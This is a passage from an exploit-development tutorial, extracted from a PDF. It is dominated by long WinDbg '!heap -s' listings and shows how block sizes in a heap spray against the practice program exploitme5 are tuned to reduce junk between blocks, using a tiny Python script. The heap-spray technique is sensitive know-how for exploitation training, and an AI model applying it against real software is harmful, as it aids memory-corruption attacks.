 0aeb0000 (size 00000000)
 
Virtual block: 0afc0000 
-
 0afc0000 (size 00000000)
 
Virtual block: 0b0d0000 
-
 0b0d0000 (size 000
00000)
 
Virtual block: 0b1e0000 
-
 0b1e0000 (size 00000000)
 
Virtual block: 0b2f0000 
-
 0b2f0000 (size 00000000)
 
Virtual block: 0b400000 
-
 0b400000 (size 00000000)
 
Virtual block: 0b510000 
-
 0b510000 (size 00000000)
 
Virtual block: 0b620000 
-
 0b620000 (size 0000
0000)
 
Virtual block: 0b730000 
-
 0b730000 (size 00000000)
 
Virtual block: 0b840000 
-
 0b840000 (size 00000000)
 
Virtual block: 0b950000 
-
 0b950000 (size 00000000)
 
Virtual block: 0ba60000 
-
 0ba60000 (size 00000000)
 
Virtual block: 0bb70000 
-
 0bb70000 (size 00000
000)
 
Virtual block: 0bc80000 
-
 0bc80000 (size 00000000)
 
Virtual block: 0bd90000 
-
 0bd90000 (size 00000000)
 
Virtual block: 0bea0000 
-
 0bea0000 (size 00000000)
 
Virtual block: 0bfb0000 
-
 0bfb0000 (size 00000000)
 
Virtual block: 0c0c0000 
-
 0c0c0000 (size 000000
00)
 
Virtual block: 0c1d0000 
-
 0c1d0000 (size 00000000)
 
Virtual block: 0c2e0000 
-
 0c2e0000 (size 00000000)
 
Virtual block: 0c3f0000 
-
 0c3f0000 (size 00000000)
 
Virtual block: 0c500000 
-
 0c500000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 196 
-
 
Virtual block: 0c610000 
-
 0c610000 (size 0000000
0)
 
Virtual block: 0c720000 
-
 0c720000 (size 00000000)
 
Virtual block: 0c830000 
-
 0c830000 (size 00000000)
 
Virtual block: 0c940000 
-
 0c940000 (size 00000000)
 
Virtual block: 0ca50000 
-
 0ca50000 (size 00000000)
 
Virtual block: 0cb60000 
-
 0cb60000 (size 00000000
)
 
Virtual block: 0cc70000 
-
 0cc70000 (size 00000000)
 
Virtual block: 0cd80000 
-
 0cd80000 (size 00000000)
 
Virtual block: 0ce90000 
-
 0ce90000 (size 00000000)
 
Virtual block: 0cfa0000 
-
 0cfa0000 (size 00000000)
 
Virtual block: 0d0b0000 
-
 0d0b0000 (size 00000000)
 
Virtual block: 0d1c0000 
-
 0d1c0000 (size 00000000)
 
Virtual block: 0d2d0000 
-
 0d2d0000 (size 00000000)
 
Virtual block: 0d3e0000 
-
 0d3e0000 (size 00000000)
 
Virtual block: 0d4f0000 
-
 0d4f0000 (size 00000000)
 
Virtual block: 0d600000 
-
 0d600000 (size 00000000)
 
Virtual block: 0d710000 
-
 0d710000 (size 00000000)
 
Virtual block: 0d820000 
-
 0d820000 (size 00000000)
 
Virtual block: 0d930000 
-
 0d930000 (size 00000000)
 
Virtual block: 0da40000 
-
 0da40000 (size 00000000)
 
Virtual block: 0db50000 
-
 0db50000 (size 00000000)
 
V
irtual block: 0dc60000 
-
 0dc60000 (size 00000000)
 
Virtual block: 0dd70000 
-
 0dd70000 (size 00000000)
 
Virtual block: 0de80000 
-
 0de80000 (size 00000000)
 
Virtual block: 0df90000 
-
 0df90000 (size 00000000)
 
Virtual block: 0e0a0000 
-
 0e0a0000 (size 00000000)
 
Vi
rtual block: 0e1b0000 
-
 0e1b0000 (size 00000000)
 
Virtual block: 0e2c0000 
-
 0e2c0000 (size 00000000)
 
Virtual block: 0e3d0000 
-
 0e3d0000 (size 00000000)
 
Virtual block: 0e4e0000 
-
 0e4e0000 (size 00000000)
 
Virtual block: 0e5f0000 
-
 0e5f0000 (size 00000000)
 
Vir
tual block: 0e700000 
-
 0e700000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 197 
-
 
Virtual block: 0e810000 
-
 0e810000 (size 00000000)
 
Virtual block: 0e920000 
-
 0e920000 (size 00000000)
 
Virtual block: 0ea30000 
-
 0ea30000 (size 00000000)
 
Virtual block: 0eb40000 
-
 0eb40000 (size 00000000)
 
Virt
ual block: 0ec50000 
-
 0ec50000 (size 00000000)
 
Virtual block: 0ed60000 
-
 0ed60000 (size 00000000)
 
Virtual block: 0ee70000 
-
 0ee70000 (size 00000000)
 
Virtual block: 0ef80000 
-
 0ef80000 (size 00000000)
 
Virtual block: 0f090000 
-
 0f090000 (size 00000000)
 
Virtu
al block: 0f1a0000 
-
 0f1a0000 (size 00000000)
 
Virtual block: 0f2b0000 
-
 0f2b0000 (size 00000000)
 
Virtual block: 0f3c0000 
-
 0f3c0000 (size 00000000)
 
Virtual block: 0f4d0000 
-
 0f4d0000 (size 00000000)
 
Virtual block: 0f5e0000 
-
 0f5e0000 (size 00000000)
 
001400
00 40000062    1024    188   1024     93     9     1  201      0      
 
00650000 40001062      64     12     64      2     2     1    0      0      
 
01c80000 40001062    1088    160   1088     68     5     2    0      0      
 
01e10000 40001062     256      
4    256      2     1     1    0      0      
 
-----------------------------------------------------------------------------
 
By comparing the addresses, you can verify that the virtual blocks listed by 
!heap
 are the same blocks we 
allocated in 
exploitme5
 an
d listed by 
listBlocks()
. There’s a difference though:
 
block 200: address = 0x0f5e0020; size = 1048576         <
----
 listBlocks()
 
Virtual block: 0f5e0000 
-
 0f5e0000 (size 00000000)      <
----
 !heap
 
As we can see, there are 
0x20
 bytes of metadata (header) s
o the block starts at 
0f5e0000
, but the usable 
portion starts at 
0f5e0020
.
 
!heap
 doesn’t show us the real size, but we know that each block is 
1 MB
, i.e. 
0x100000
. Except for the first 
two blocks, the distance between two adjacent blocks is 
0x110000
, so th
ere are almost 
0x10000
 bytes = 
64 
KB
 of junk data between adjacent blocks. We’d like to reduce the amount of junk data as much as possible. 
Let’s try to reduce the size of our blocks. Here’s the updated script:
 
Python
 
 
with
 
open
(
r'd:
\
buf.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
f
.
write
(
'a'
*(
0x100000
-
0x20
))
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 198 
-
 
 
After creating 
buf.dat
, we restart 
exploitme5.exe
 in WinDbg, allocate the blocks and we get the following:
 
0:001> !heap 
-
s
 
NtGlobalFlag enables following debugging aids for new heaps:
 
    tail checking
 
    free checking
 
  
  validate parameters
 
LFH Key                   : 0x6c0192f2
 
Termination on corruption : ENABLED
 
  Heap     Flags   Reserv  Commit  Virt   Free  List   UCR  Virt  Lock  Fast
 
                    (k)     (k)    (k)     (k) length      blocks cont. heap
 
-----
------------------------------------------------------------------------
 
Virtual block: 020d0000 
-
 020d0000 (size 00000000)
 
Virtual block: 022e0000 
-
 022e0000 (size 00000000)
 
Virtual block: 023f0000 
-
 023f0000 (size 00000000)
 
Virtual block: 02500000 
-
 0250
0000 (size 00000000)
 
Virtual block: 02610000 
-
 02610000 (size 00000000)
 
Virtual block: 02720000 
-
 02720000 (size 00000000)
 
Virtual block: 02830000 
-
 02830000 (size 00000000)
 
Virtual block: 02940000 
-
 02940000 (size 00000000)
 
Virtual block: 02a50000 
-
 02a50
000 (size 00000000)
 
Virtual block: 02b60000 
-
 02b60000 (size 00000000)
 
Virtual block: 02c70000 
-
 02c70000 (size 00000000)
 
Virtual block: 02d80000 
-
 02d80000 (size 00000000)
 
Virtual block: 02e90000 
-
 02e90000 (size 00000000)
 
Virtual block: 02fa0000 
-
 02fa00
00 (size 00000000)
 
Virtual block: 030b0000 
-
 030b0000 (size 00000000)
 
Virtual block: 031c0000 
-
 031c0000 (size 00000000)
 
Virtual block: 032d0000 
-
 032d0000 (size 00000000)
 
Virtual block: 033e0000 
-
 033e0000 (size 00000000)
 
Virtual block: 034f0000 
-
 034f000
0 (size 00000000)
 
Virtual block: 03600000 
-
 03600000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 199 
-
 
Virtual block: 03710000 
-
 03710000 (size 00000000)
 
Virtual block: 03820000 
-
 03820000 (size 00000000)
 
Virtual block: 03930000 
-
 03930000 (size 00000000)
 
Virtual block: 03a40000 
-
 03a40000
 (size 00000000)
 
Virtual block: 03b50000 
-
 03b50000 (size 00000000)
 
Virtual block: 03c60000 
-
 03c60000 (size 00000000)
 
Virtual block: 03d70000 
-
 03d70000 (size 00000000)
 
Virtual block: 03e80000 
-
 03e80000 (size 00000000)
 
Virtual block: 03f90000 
-
 03f90000 
(size 00000000)
 
Virtual block: 040a0000 
-
 040a0000 (size 00000000)
 
Virtual block: 041b0000 
-
 041b0000 (size 00000000)
 
Virtual block: 042c0000 
-
 042c0000 (size 00000000)
 
Virtual block: 043d0000 
-
 043d0000 (size 00000000)
 
Virtual block: 044e0000 
-
 044e0000 (
size 00000000)
 
Virtual block: 045f0000 
-
 045f0000 (size 00000000)
 
Virtual block: 04700000 
-
 04700000 (size 00000000)
 
Virtual block: 04810000 
-
 04810000 (size 00000000)
 
Virtual block: 04920000 
-
 04920000 (size 00000000)
 
Virtual block: 04a30000 
-
 04a30000 (s
ize 00000000)
 
Virtual block: 04b40000 
-
 04b40000 (size 00000000)
 
Virtual block: 04c50000 
-
 04c50000 (size 00000000)
 
Virtual block: 04d60000 
-
 04d60000 (size 00000000)
 
Virtual block: 04e70000 
-
 04e70000 (size 00000000)
 
Virtual block: 04f80000 
-
 04f80000 (si
ze 00000000)
 
Virtual block: 05090000 
-
 05090000 (size 00000000)
 
Virtual block: 051a0000 
-
 051a0000 (size 00000000)
 
Virtual block: 052b0000 
-
 052b0000 (size 00000000)
 
Virtual block: 053c0000 
-
 053c0000 (size 00000000)
 
Virtual block: 054d0000 
-
 054d0000 (siz
e 00000000)
 
Virtual block: 055e0000 
-
 055e0000 (size 00000000)
 
Virtual block: 056f0000 
-
 056f0000 (size 00000000)
 
Virtual block: 05800000 
-
 05800000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 200 
-
 
Virtual block: 05910000 
-
 05910000 (size 00000000)
 
Virtual block: 05a20000 
-
 05a20000 (size
 00000000)
 
Virtual block: 05b30000 
-
 05b30000 (size 00000000)
 
Virtual block: 05c40000 
-
 05c40000 (size 00000000)
 
Virtual block: 05d50000 
-
 05d50000 (size 00000000)
 
Virtual block: 05e60000 
-
 05e60000 (size 00000000)
 
Virtual block: 05f70000 
-
 05f70000 (size 
00000000)
 
Virtual block: 06080000 
-
 06080000 (size 00000000)
 
Virtual block: 06190000 
-
 06190000 (size 00000000)
 
Virtual block: 062a0000 
-
 062a0000 (size 00000000)
 
Virtual block: 063b0000 
-
 063b0000 (size 00000000)
 
Virtual block: 064c0000 
-
 064c0000 (size 0
0000000)
 
Virtual block: 065d0000 
-
 065d0000 (size 00000000)
 
Virtual block: 066e0000 
-
 066e0000 (size 00000000)
 
Virtual block: 067f0000 
-
 067f0000 (size 00000000)
 
Virtual block: 06900000 
-
 06900000 (size 00000000)
 
Virtual block: 06a10000 
-
 06a10000 (size 00
000000)
 
Virtual block: 06b20000 
-
 06b20000 (size 00000000)
 
Virtual block: 06c30000 
-
 06c30000 (size 00000000)
 
Virtual block: 06d40000 
-
 06d40000 (size 00000000)
 
Virtual block: 06e50000 
-
 06e50000 (size 00000000)
 
Virtual block: 06f60000 
-
 06f60000 (size 000
00000)
 
Virtual block: 07070000 
-
 07070000 (size 00000000)
 
Virtual block: 07180000 
-
 07180000 (size 00000000)
 
Virtual block: 07290000 
-
 07290000 (size 00000000)
 
Virtual block: 073a0000 
-
 073a0000 (size 00000000)
 
Virtual block: 074b0000 
-
 074b0000 (size 0000
0000)
 
Virtual block: 075c0000 
-
 075c0000 (size 00000000)
 
Virtual block: 076d0000 
-
 076d0000 (size 00000000)
 
Virtual block: 077e0000 
-
 077e0000 (size 00000000)
 
Virtual block: 078f0000 
-
 078f0000 (size 00000000)
 
Virtual block: 07a00000 
-
 07a00000 (size 00000
000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 201 
-
 
Virtual block: 07b10000 
-
 07b10000 (size 00000000)
 
Virtual block: 07c20000 
-
 07c20000 (size 00000000)
 
Virtual block: 07d30000 
-
 07d30000 (size 00000000)
 
Virtual block: 07e40000 
-
 07e40000 (size 00000000)
 
Virtual block: 07f50000 
-
 07f50000 (size 000000
00)
 
Virtual block: 08060000 
-
 08060000 (size 00000000)
 
Virtual block: 08170000 
-
 08170000 (size 00000000)
 
Virtual block: 08280000 
-
 08280000 (size 00000000)
 
Virtual block: 08390000 
-
 08390000 (size 00000000)
 
Virtual block: 084a0000 
-
 084a0000 (size 0000000
0)
 
Virtual block: 085b0000 
-
 085b0000 (size 00000000)
 
Virtual block: 086c0000 
-
 086c0000 (size 00000000)
 
Virtual block: 087d0000 
-
 087d0000 (size 00000000)
 
Virtual block: 088e0000 
-
 088e0000 (size 00000000)
 
Virtual block: 089f0000 
-
 089f0000 (size 00000000
)
 
Virtual block: 08b00000 
-
 08b00000 (size 00000000)
 
Virtual block: 08c10000 
-
 08c10000 (size 00000000)
 
Virtual block: 08d20000 
-
 08d20000 (size 00000000)
 
Virtual block: 08e30000 
-
 08e30000 (size 00000000)
 
Virtual block: 08f40000 
-
 08f40000 (size 00000000)
 
Virtual block: 09050000 
-
 09050000 (size 00000000)
 
Virtual block: 09160000 
-
 09160000 (size 00000000)
 
Virtual block: 09270000 
-
 09270000 (size 00000000)
 
Virtual block: 09380000 
-
 09380000 (size 00000000)
 
Virtual block: 09490000 
-
 09490000 (size 00000000)
 
Virtual block: 095a0000 
-
 095a0000 (size 00000000)
 
Virtual block: 096b0000 
-
 096b0000 (size 00000000)
 
Virtual block: 097c0000 
-
 097c0000 (size 00000000)
 
Virtual block: 098d0000 
-
 098d0000 (size 00000000)
 
Virtual block: 099e0000 
-
 099e0000 (size 00000000)
 
V
irtual block: 09af0000 
-
 09af0000 (size 00000000)
 
Virtual block: 09c00000 
-
 09c00000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 202 
-
 
Virtual block: 09d10000 
-
 09d10000 (size 00000000)
 
Virtual block: 09e20000 
-
 09e20000 (size 00000000)
 
Virtual block: 09f30000 
-
 09f30000 (size 00000000)
 
Vi
rtual block: 0a040000 
-
 0a040000 (size 00000000)
 
Virtual block: 0a150000 
-
 0a150000 (size 00000000)
 
Virtual block: 0a260000 
-
 0a260000 (size 00000000)
 
Virtual block: 0a370000 
-
 0a370000 (size 00000000)
 
Virtual block: 0a480000 
-
 0a480000 (size 00000000)
 
Vir
tual block: 0a590000 
-
 0a590000 (size 00000000)
 
Virtual block: 0a6a0000 
-
 0a6a0000 (size 00000000)
 
Virtual block: 0a7b0000 
-
 0a7b0000 (size 00000000)
 
Virtual block: 0a8c0000 
-
 0a8c0000 (size 00000000)
 
Virtual block: 0a9d0000 
-
 0a9d0000 (size 00000000)
 
Virt
ual block: 0aae0000 
-
 0aae0000 (size 00000000)
 
Virtual block: 0abf0000 
-
 0abf0000 (size 00000000)
 
Virtual block: 0ad00000 
-
 0ad00000 (size 00000000)
 
Virtual block: 0ae10000 
-
 0ae10000 (size 00000000)
 
Virtual block: 0af20000 
-
 0af20000 (size 00000000)
 
Virtu
al block: 0b030000 
-
 0b030000 (size 00000000)
 
Virtual block: 0b140000 
-
 0b140000 (size 00000000)
 
Virtual block: 0b250000 
-
 0b250000 (size 00000000)
 
Virtual block: 0b360000 
-
 0b360000 (size 00000000)
 
Virtual block: 0b470000 
-
 0b470000 (size 00000000)
 
Virtua
l block: 0b580000 
-
 0b580000 (size 00000000)
 
Virtual block: 0b690000 
-
 0b690000 (size 00000000)
 
Virtual block: 0b7a0000 
-
 0b7a0000 (size 00000000)
 
Virtual block: 0b8b0000 
-
 0b8b0000 (size 00000000)
 
Virtual block: 0b9c0000 
-
 0b9c0000 (size 00000000)
 
Virtual
 block: 0bad0000 
-
 0bad0000 (size 00000000)
 
Virtual block: 0bbe0000 
-
 0bbe0000 (size 00000000)
 
Virtual block: 0bcf0000 
-
 0bcf0000 (size 00000000)
 
Virtual block: 0be00000 
-
 0be00000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 203 
-
 
Virtual block: 0bf10000 
-
 0bf10000 (size 00000000)
 
Virtual 
block: 0c020000 
-
 0c020000 (size 00000000)
 
Virtual block: 0c130000 
-
 0c130000 (size 00000000)
 
Virtual block: 0c240000 
-
 0c240000 (size 00000000)
 
Virtual block: 0c350000 
-
 0c350000 (size 00000000)
 
Virtual block: 0c460000 
-
 0c460000 (size 00000000)
 
Virtual b
lock: 0c570000 
-
 0c570000 (size 00000000)
 
Virtual block: 0c680000 
-
 0c680000 (size 00000000)
 
Virtual block: 0c790000 
-
 0c790000 (size 00000000)
 
Virtual block: 0c8a0000 
-
 0c8a0000 (size 00000000)
 
Virtual block: 0c9b0000 
-
 0c9b0000 (size 00000000)
 
Virtual bl
ock: 0cac0000 
-
 0cac0000 (size 00000000)
 
Virtual block: 0cbd0000 
-
 0cbd0000 (size 00000000)
 
Virtual block: 0cce0000 
-
 0cce0000 (size 00000000)
 
Virtual block: 0cdf0000 
-
 0cdf0000 (size 00000000)
 
Virtual block: 0cf00000 
-
 0cf00000 (size 00000000)
 
Virtual blo
ck: 0d010000 
-
 0d010000 (size 00000000)
 
Virtual block: 0d120000 
-
 0d120000 (size 00000000)
 
Virtual block: 0d230000 
-
 0d230000 (size 00000000)
 
Virtual block: 0d340000 
-
 0d340000 (size 00000000)
 
Virtual block: 0d450000 
-
 0d450000 (size 00000000)
 
Virtual bloc
k: 0d560000 
-
 0d560000 (size 00000000)
 
Virtual block: 0d670000 
-
 0d670000 (size 00000000)
 
Virtual block: 0d780000 
-
 0d780000 (size 00000000)
 
Virtual block: 0d890000 
-
 0d890000 (size 00000000)
 
Virtual block: 0d9a0000 
-
 0d9a0000 (size 00000000)
 
Virtual block
: 0dab0000 
-
 0dab0000 (size 00000000)
 
Virtual block: 0dbc0000 
-
 0dbc0000 (size 00000000)
 
Virtual block: 0dcd0000 
-
 0dcd0000 (size 00000000)
 
Virtual block: 0dde0000 
-
 0dde0000 (size 00000000)
 
Virtual block: 0def0000 
-
 0def0000 (size 00000000)
 
Virtual block:
 0e000000 
-
 0e000000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 204 
-
 
Virtual block: 0e110000 
-
 0e110000 (size 00000000)
 
Virtual block: 0e220000 
-
 0e220000 (size 00000000)
 
Virtual block: 0e330000 
-
 0e330000 (size 00000000)
 
Virtual block: 0e440000 
-
 0e440000 (size 00000000)
 
Virtual block: 
0e550000 
-
 0e550000 (size 00000000)
 
Virtual block: 0e660000 
-
 0e660000 (size 00000000)
 
Virtual block: 0e770000 
-
 0e770000 (size 00000000)
 
Virtual block: 0e880000 
-
 0e880000 (size 00000000)
 
Virtual block: 0e990000 
-
 0e990000 (size 00000000)
 
Virtual block: 0
eaa0000 
-
 0eaa0000 (size 00000000)
 
Virtual block: 0ebb0000 
-
 0ebb0000 (size 00000000)
 
Virtual block: 0ecc0000 
-
 0ecc0000 (size 00000000)
 
Virtual block: 0edd0000 
-
 0edd0000 (size 00000000)
 
Virtual block: 0eee0000 
-
 0eee0000 (size 00000000)
 
Virtual block: 0e
ff0000 
-
 0eff0000 (size 00000000)
 
Virtual block: 0f100000 
-
 0f100000 (size 00000000)
 
Virtual block: 0f210000 
-
 0f210000 (size 00000000)
 
Virtual block: 0f320000 
-
 0f320000 (size 00000000)
 
Virtual block: 0f430000 
-
 0f430000 (size 00000000)
 
Virtual block: 0f5
40000 
-
 0f540000 (size 00000000)
 
Virtual block: 0f650000 
-
 0f650000 (size 00000000)
 
00700000 40000062    1024    188   1024     93     9     1  201      0      
 
00190000 40001062      64     12     64      2     2     1    0      0      
 
020c0000 40001062 
   1088    160   1088     68     5     2    0      0      
 
022a0000 40001062     256      4    256      2     1     1    0      0      
 
-----------------------------------------------------------------------------
 
Nothing changed! Let’s try to reduce the s
ize of our blocks even more:
 
Python
 
 
with
 
open
(
r'd:
\
buf.dat'
,
 
'wb'
)
 
as
 
f
:
 
    
f
.
write
(
'a'
*(
0x100000
-
0x30
))
 
 
In WinDbg:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 205 
-
 
0:001> !heap 
-
s
 
NtGlobalFlag enables following debugging aids for new heaps:
 
    tail checking
 
    free checking
 
    validate parameters
 
LFH Key                   : 0x4863b9c2
 
Termination on corruption : ENABLED
 
  Heap     Flags   Reserv  Commit  Virt   Free  List   UCR  Virt  Lock  Fast
 
                    (k)     (k)    (k)     (k) length      blocks cont. heap
 
---------------------------
--------------------------------------------------
 
Virtual block: 00c60000 
-
 00c60000 (size 00000000)
 
Virtual block: 00e60000 
-
 00e60000 (size 00000000)
 
Virtual block: 00f60000 
-
 00f60000 (size 00000000)
 
Virtual block: 01060000 
-
 01060000 (size 00000000)
 
V
irtual block: 01160000 
-
 01160000 (size 00000000)
 
Virtual block: 02730000 
-
 02730000 (size 00000000)
 
Virtual block: 02830000 
-
 02830000 (size 00000000)
 
Virtual block: 02930000 
-
 02930000 (size 00000000)
 
Virtual block: 02a30000 
-
 02a30000 (size 00000000)
 
Vi
rtual block: 02b30000 
-
 02b30000 (size 00000000)
 
Virtual block: 02c30000 
-
 02c30000 (size 00000000)
 
Virtual block: 02d30000 
-
 02d30000 (size 00000000)
 
Virtual block: 02e30000 
-
 02e30000 (size 00000000)
 
Virtual block: 02f30000 
-
 02f30000 (size 00000000)
 
Vir
tual block: 03030000 
-
 03030000 (size 00000000)
 
Virtual block: 03130000 
-
 03130000 (size 00000000)
 
Virtual block: 03230000 
-
 03230000 (size 00000000)
 
Virtual block: 03330000 
-
 03330000 (size 00000000)
 
Virtual block: 03430000 
-
 03430000 (size 00000000)
 
Virt
ual block: 03530000 
-
 03530000 (size 00000000)
 
Virtual block: 03630000 
-
 03630000 (size 00000000)
 
Virtual block: 03730000 
-
 03730000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 206 
-
 
Virtual block: 03830000 
-
 03830000 (size 00000000)
 
Virtual block: 03930000 
-
 03930000 (size 00000000)
 
Virtu
al block: 03a30000 
-
 03a30000 (size 00000000)
 
Virtual block: 03b30000 
-
 03b30000 (size 00000000)
 
Virtual block: 03c30000 
-
 03c30000 (size 00000000)
 
Virtual block: 03d30000 
-
 03d30000 (size 00000000)
 
Virtual block: 03e30000 
-
 03e30000 (size 00000000)
 
Virtua
l block: 03f30000 
-
 03f30000 (size 00000000)
 
Virtual block: 04030000 
-
 04030000 (size 00000000)
 
Virtual block: 04130000 
-
 04130000 (size 00000000)
 
Virtual block: 04230000 
-
 04230000 (size 00000000)
 
Virtual block: 04330000 
-
 04330000 (size 00000000)
 
Virtual
 block: 04430000 
-
 04430000 (size 00000000)
 
Virtual block: 04530000 
-
 04530000 (size 00000000)
 
Virtual block: 04630000 
-
 04630000 (size 00000000)
 
Virtual block: 04730000 
-
 04730000 (size 00000000)
 
Virtual block: 04830000 
-
 04830000 (size 00000000)
 
Virtual 
block: 04930000 
-
 04930000 (size 00000000)
 
Virtual block: 04a30000 
-
 04a30000 (size 00000000)
 
Virtual block: 04b30000 
-
 04b30000 (size 00000000)
 
Virtual block: 04c30000 
-
 04c30000 (size 00000000)
 
Virtual block: 04d30000 
-
 04d30000 (size 00000000)
 
Virtual b
lock: 04e30000 
-
 04e30000 (size 00000000)
 
Virtual block: 04f30000 
-
 04f30000 (size 00000000)
 
Virtual block: 05030000 
-
 05030000 (size 00000000)
 
Virtual block: 05130000 
-
 05130000 (size 00000000)
 
Virtual block: 05230000 
-
 05230000 (size 00000000)
 
Virtual bl
ock: 05330000 
-
 05330000 (size 00000000)
 
Virtual block: 05430000 
-
 05430000 (size 00000000)
 
Virtual block: 05530000 
-
 05530000 (size 00000000)
 
Virtual block: 05630000 
-
 05630000 (size 00000000)
 
Virtual block: 05730000 
-
 05730000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 207 
-
 
Virtual blo
ck: 05830000 
-
 05830000 (size 00000000)
 
Virtual block: 05930000 
-
 05930000 (size 00000000)
 
Virtual block: 05a30000 
-
 05a30000 (size 00000000)
 
Virtual block: 05b30000 
-
 05b30000 (size 00000000)
 
Virtual block: 05c30000 
-
 05c30000 (size 00000000)
 
Virtual bloc
k: 05d30000 
-
 05d30000 (size 00000000)
 
Virtual block: 05e30000 
-
 05e30000 (size 00000000)
 
Virtual block: 05f30000 
-
 05f30000 (size 00000000)
 
Virtual block: 06030000 
-
 06030000 (size 00000000)
 
Virtual block: 06130000 
-
 06130000 (size 00000000)
 
Virtual block
: 06230000 
-
 06230000 (size 00000000)
 
Virtual block: 06330000 
-
 06330000 (size 00000000)
 
Virtual block: 06430000 
-
 06430000 (size 00000000)
 
Virtual block: 06530000 
-
 06530000 (size 00000000)
 
Virtual block: 06630000 
-
 06630000 (size 00000000)
 
Virtual block:
 06730000 
-
 06730000 (size 00000000)
 
Virtual block: 06830000 
-
 06830000 (size 00000000)
 
Virtual block: 06930000 
-
 06930000 (size 00000000)
 
Virtual block: 06a30000 
-
 06a30000 (size 00000000)
 
Virtual block: 06b30000 
-
 06b30000 (size 00000000)
 
Virtual block: 
06c30000 
-
 06c30000 (size 00000000)
 
Virtual block: 06d30000 
-
 06d30000 (size 00000000)
 
Virtual block: 06e30000 
-
 06e30000 (size 00000000)
 
Virtual block: 06f30000 
-
 06f30000 (size 00000000)
 
Virtual block: 07030000 
-
 07030000 (size 00000000)
 
Virtual block: 0
7130000 
-
 07130000 (size 00000000)
 
Virtual block: 07230000 
-
 07230000 (size 00000000)
 
Virtual block: 07330000 
-
 07330000 (size 00000000)
 
Virtual block: 07430000 
-
 07430000 (size 00000000)
 
Virtual block: 07530000 
-
 07530000 (size 00000000)
 
Virtual block: 07
630000 
-
 07630000 (size 00000000)
 
Virtual block: 07730000 
-
 07730000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 208 
-
 
Virtual block: 07830000 
-
 07830000 (size 00000000)
 
Virtual block: 07930000 
-
 07930000 (size 00000000)
 
Virtual block: 07a30000 
-
 07a30000 (size 00000000)
 
Virtual block: 07b
30000 
-
 07b30000 (size 00000000)
 
Virtual block: 07c30000 
-
 07c30000 (size 00000000)
 
Virtual block: 07d30000 
-
 07d30000 (size 00000000)
 
Virtual block: 07e30000 
-
 07e30000 (size 00000000)
 
Virtual block: 07f30000 
-
 07f30000 (size 00000000)
 
Virtual block: 0803
0000 
-
 08030000 (size 00000000)
 
Virtual block: 08130000 
-
 08130000 (size 00000000)
 
Virtual block: 08230000 
-
 08230000 (size 00000000)
 
Virtual block: 08330000 
-
 08330000 (size 00000000)
 
Virtual block: 08430000 
-
 08430000 (size 00000000)
 
Virtual block: 08530
000 
-
 08530000 (size 00000000)
 
Virtual block: 08630000 
-
 08630000 (size 00000000)
 
Virtual block: 08730000 
-
 08730000 (size 00000000)
 
Virtual block: 08830000 
-
 08830000 (size 00000000)
 
Virtual block: 08930000 
-
 08930000 (size 00000000)
 
Virtual block: 08a300
00 
-
 08a30000 (size 00000000)
 
Virtual block: 08b30000 
-
 08b30000 (size 00000000)
 
Virtual block: 08c30000 
-
 08c30000 (size 00000000)
 
Virtual block: 08d30000 
-
 08d30000 (size 00000000)
 
Virtual block: 08e30000 
-
 08e30000 (size 00000000)
 
Virtual block: 08f3000
0 
-
 08f30000 (size 00000000)
 
Virtual block: 09030000 
-
 09030000 (size 00000000)
 
Virtual block: 09130000 
-
 09130000 (size 00000000)
 
Virtual block: 09230000 
-
 09230000 (size 00000000)
 
Virtual block: 09330000 
-
 09330000 (size 00000000)
 
Virtual block: 09430000
 
-
 09430000 (size 00000000)
 
Virtual block: 09530000 
-
 09530000 (size 00000000)
 
Virtual block: 09630000 
-
 09630000 (size 00000000)
 
Virtual block: 09730000 
-
 09730000 (size 00000000)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 209 
-
 
Virtual block: 09830000 
-
 09830000 (size 00000000)
 
Virtual block: 09930000 
-
 09930000 (size 00000000)
 
Virtual block: 09a30000 
-
 09a30000 (size 00000000)
 
Virtual block: 09b30000 
-
 09b30000 (size 00000000)
 
Virtual block: 09c30000 
-
 09c30000 (size 00000000)
 
Virtual block: 09d30000 
-
 09d30000 (size 00000000)
 
Virtual block: 09e30000 
-
 09e30000 (size 00000000)
 
Virtual block: 09f30000 
-
 09f30000 (size 00000000)
 
Virtual block: 0a030000 
-
 0a030000 (size 00000000)
 
Virtual block: 0a130000 
-
 0a130000 (size 00000000)
 
Virtual block: 0a230000 
-
 0a230000 (size 00000000)
 
Virtual block: 0a330000 
-
 
0a330000 (size 00000000)
 
Virtual block: 0a430000 
-
 0a430000 (size 00000000)
 
Virtual block: 0a530000 
-
 0a530000 (size 00000000)
 
Virtual block: 0a630000 
-
 0a630000 (size 00000000)
 
Virtual block: 0a730000 
-
 0a730000 (size 00000000)
 
Virtual block: 0a830000 
-
 0
a830000 (size 00000000)
 
Virtual block: 0a930000 
-
 0a930000 (size 00000000)
 
Virtual block: 0aa30000 
-
 0aa30000 (size 00000000)
 
Virtual block: 0ab30000 
-
 0ab30000 (size 00000000)
 
Virtual block: 0ac30000 
-
 0ac30000 (size 00000000)
 
Virtual block: 0ad30000 
-
 0a
d30000 (size 00000000)
 
Virtual block: 0ae30000 
